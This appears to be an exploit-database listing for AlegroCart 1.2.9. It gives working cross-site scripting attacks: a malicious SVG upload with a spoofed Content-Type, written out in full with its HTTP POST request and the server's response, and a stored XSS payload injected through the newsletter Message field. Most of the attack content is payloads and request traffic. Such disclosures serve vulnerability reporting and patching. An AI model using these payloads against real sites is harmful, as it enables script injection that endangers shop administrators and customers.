Exploit for AlegroCart 1.2.9 Cross Site Scripting

Name: Exploit for AlegroCart 1.2.9 Cross Site Scripting
Rating: 5 (130 reviews)
2025-04-24 | CVSS 6.8
## https://sploitus.com/exploit?id=PACKETSTORM:190656
# Exploit Title: XSS via SVG Image Upload - alegrocartv1.2.9
    # Date: 04/2025
    # Exploit Author: Andrey Stoykov
    # Version: 1.2.9
    # Tested on: Debian 12
    # Blog: https://msecureltd.blogspot.com/
    
    XSS via SVG Image Upload:
    
    Steps to Reproduce:
    
    1. Visit http://192.168.58.129/alegrocart/administrator/?controller=download
    2. Upload SVG image file with the contents below
    3. Intercept the POST request and change the Content-Type to "Content-Type:
    image/jpg"
    4. Then visit "http://192.168.58.129/alegrocart/download/xss.svg" to
    trigger the XSS
    
    
    <svg width="200" height="200" xmlns="http://www.w3.org/2000/svg">
        <foreignObject width="100%" height="100%">
            <body xmlns="http://www.w3.org/1999/xhtml">
                <input type="text" onkeyup="prompt('XSS Triggered!')"
    placeholder="Type here..."/>
            </body>
        </foreignObject>
    </svg>
    
    
    // HTTP POST request
    
    POST /alegrocart/administrator/?controller=download&action=insert HTTP/1.1
    Host: 192.168.58.129
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0)
    Gecko/20100101 Firefox/138.0
    [...]
    
    ------geckoformboundary15d78a6e0de83d7fc006c8ad803bfefc
    Content-Disposition: form-data; name="language[1][name]"
    
    {{7*7}}
    ------geckoformboundary15d78a6e0de83d7fc006c8ad803bfefc
    Content-Disposition: form-data; name="fileName"
    
    xss.svg
    ------geckoformboundary15d78a6e0de83d7fc006c8ad803bfefc
    Content-Disposition: form-data; name="download"; filename="xss.svg"
    Content-Type: image/jpg
    
    <svg width="200" height="200" xmlns="http://www.w3.org/2000/svg">
        <foreignObject width="100%" height="100%">
            <body xmlns="http://www.w3.org/1999/xhtml">
                <input type="text" onkeyup="prompt('XSS Triggered!')"
    placeholder="Type here..."/>
            </body>
        </foreignObject>
    </svg>
    ------geckoformboundary15d78a6e0de83d7fc006c8ad803bfefc
    Content-Disposition: form-data; name="mask"
    
    6760664742675684.svg
    ------geckoformboundary15d78a6e0de83d7fc006c8ad803bfefc
    Content-Disposition: form-data; name="remaining"
    
    1
    ------geckoformboundary15d78a6e0de83d7fc006c8ad803bfefc
    Content-Disposition: form-data; name="79d45153379f999ff64e1198b05faae6"
    
    586fdeeeaf42c0c557291be4d32afe11
    ------geckoformboundary15d78a6e0de83d7fc006c8ad803bfefc--
    
    
    // HTTP Response
    
    HTTP/1.1 302 Found
    Date: Thu, 03 Apr 2025 20:42:59 GMT
    Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev
    Perl/v5.16.3
    X-Powered-By: PHP/5.6.40
    Location:
    http://192.168.58.129/alegrocart/administrator/?controller=download
    Cache-Control: max-age=0, private, no-store, no-cache, must-revalidate
    Expires: Thu, 03 Apr 2025 20:42:59 GMT
    Content-Length: 0
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
    
    
    
    # Exploit Title: Stored XSS in "Message" Functionality - alegrocartv1.2.9
    # Date: 04/2025
    # Exploit Author: Andrey Stoykov
    # Version: 1.2.9
    # Tested on: Debian 12
    # Blog: https://msecureltd.blogspot.com/
    
    Stored XSS #1:
    
    Steps to Reproduce:
    
    1. Login as demonstrator account and visit "Customers" > "Newsletter"
    2. In "Message" use the following XSS payload
    
    <iframe srcdoc="<img src=x onerror=alert(document.domain)>"></iframe>